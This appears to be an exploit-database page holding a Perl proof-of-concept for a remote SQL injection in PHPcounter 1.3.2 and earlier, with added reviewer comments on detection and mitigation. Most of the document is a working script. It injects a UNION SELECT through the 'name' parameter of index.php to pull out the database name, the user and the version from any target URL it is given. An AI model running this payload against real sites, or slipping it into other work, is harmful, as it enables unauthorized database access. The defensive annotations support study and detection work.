PHPcounter <= 1.3.2 (index.php name) Remote SQL Injection Exploit

2008-09-28 23:01:08

#!/usr/bin/perl
# -------------------------------------------------
# PHPcounter <= 1.3.2 Remote SQL Injection Exploit
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On: 28/09/2008
# -------------------------------------------------

use strict;
use LWP::UserAgent;

# Reviewer notes (defensive reading of this proof of concept):
# The script issues a single GET request to <host>/index.php, placing a SQL
# fragment in the `name` query parameter, and prints whatever the response
# contains between two `$` characters. It demonstrates that the value of
# `name` reaches a SQL statement without parameter binding or escaping
# (inferred from the advisory title; the PHP source is not shown here).
#
# Detection: in web-server or WAF logs, look for requests to index.php whose
# `name` parameter contains `union select` or `concat(0x24` (case-insensitive;
# the client library presumably percent-encodes spaces, so also match the
# encoded forms -- confirm against real log samples).
# Mitigation: bind `name` as a query parameter (prepared statement) or
# validate it strictly before use, and run the application's database
# account with the least privilege it needs. This page lists no vendor fix.

# Target base URL is taken from the first command-line argument.
my $host = shift @ARGV;
# Endpoint and parameter named in the advisory title (index.php, `name`).
my $path = "/index.php?name=";
# Injected value: a leading quote followed by a four-column UNION SELECT.
# The fourth column concatenates database(), user() and version(), separated
# by 0x3a (':') and wrapped in 0x24 ('$') so the result can be located in the
# returned page. The trailing `'/*` presumably neutralises the remainder of
# the original statement.
my $evil = "'union select 0,0,0,concat(0x24,database(),0x3a,user(),0x3a,version(),0x24)'/*";

# Print usage and exit unless the argument starts with http:// or https://.
show() unless $host =~ /^http(s)?:\/\/(.+?)$/;

# Single unauthenticated GET; no cookies, headers or retries are configured.
my $http_s = new LWP::UserAgent;
my $request = $http_s->get($host.$path.$evil);

# Success path: HTTP success status and a `$...$` delimited span in the body;
# the captured text (database:user:version per the payload) is printed.
if($request->is_success and $request->content =~ /\$(.+?)\$/) {
print "[+] $1\n";
exit;
}
# Any other outcome, including a successful response that lacks the markers,
# prints the HTTP status line.
else {
print "[!] ".$request->status_line."\n";
exit;
}

# Emit the one-line usage hint (script name taken from $0) and terminate.
# Invoked when the first argument is missing or is not an http(s):// URL.
sub show {
    printf "[?] Usage: perl %s http://[host]\n", $0;
    exit;
}

#

Fixes

No fixes
